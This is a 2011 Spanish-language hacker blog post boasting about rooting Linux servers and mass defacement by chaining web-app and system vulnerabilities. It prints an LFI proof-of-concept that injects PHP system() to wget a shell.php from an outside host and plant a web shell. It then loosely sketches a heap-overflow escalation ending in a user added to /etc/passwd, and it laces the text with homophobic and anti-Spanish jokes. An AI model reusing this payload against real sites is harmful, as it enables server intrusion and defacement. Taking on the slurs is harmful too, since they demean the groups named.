domingo, 11 de septiembre de 2011

Ing. Social + Vulns. = ROOTED

Volviendo con mis posts de webapps explicaré sencillamente algo llamado "Por qué Kevin Mitnick es tan capo y como se hace un Mass defacement masivo poderoso", prácticamente eso significa mi título.

Yo me especializo en el ataque a servidores Linux que es lo que me gusta mucho ya que presenta un "gran reto" entre comillas, ya que como los Exploit researchers saben, es más difícil encontrar alguna vulnerabilidad en Linux que en Windows. Y si no lo saben pues ya se los dije porque soy Dondata el mascapota.

Bien, como hay mucho defacer y niñito webapp (Lo siento por mis amigos que ven mi blog, ya saben, "como siempre, dondata trolleando") Se combinan las vulnerabilidades del sistema o de las aplicaciones/servicios con las webapps al momento de rootear un servidor, cosa muy entretenida porque si por ahí anda un sitio de Ubuntu nos lo cagamos como va (Broma para Failroot), así que una orientada es más que suficiente.

Sí nos damos cuenta de la gravedad de la situación cuando hay vulnerabilidad en las webapps y también en el sistema, estamos más que jodidos. Pero en otro lado, los chicos malos se aprovechan de los jodidos.

Así que vamos y explotamos la vuln de un sitio, por ejemplo, este.... LFI (Esta broma va para mis amigos españoles, hoy es día de bromas)
----------------------------------------------------------
PoC
http://sitiojodidocomotodoslos.es/directoriohomosexual-comotodoslos/españoles.php?include=<?php system("wget http://supersite.com.mx/shell.php -O gays.php"); ?>
----------------------------------------------------------

Ya explotada la vulnerabilidad, hay muchas maneras de rootear. Cómo vamos a ver desde el lado de vuln. de soft nos iremos primero con los kernel exploits.

Es una manera muy aburrida así que no pongo ningún demo, pasemos a ver que sucede si hay un programa escrito en C con una vulnerabilidad Heap Overflow.

$ ./app-vulnerable VIENDOSIVIOLOELHEAP
-- Permiso denegado

¡Chinos!, aquí lo que podría pasar es, o obtener que el administrador le ponga los permisos necesarios al fichero para aprovecharlos o hacemos alguna otra cosa. Veamos.

$./app-vulnerable VIOLEELHEAPMUAAJAJAJAJJAJAJA
userinput => ADDRESS_HEX: VIOLEELHEAPMUAJAJAJAJAJAJA
outputfile => ADRRESS_HEX: JJAJAJJAJA

Ahora a aprovecharlo metiendo un usuario en el fichero /etc/passwd. Kevin Mitnick nos ayudó un poquito. También hay otras formas como es DLL Injection y demás vulnerabilidades que podríamos ser capaces de explotar.

Algo bastante importante son los Disclosures al momento de rootear u obtener toda la información posible, suerte.

No hay comentarios:

Publicar un comentario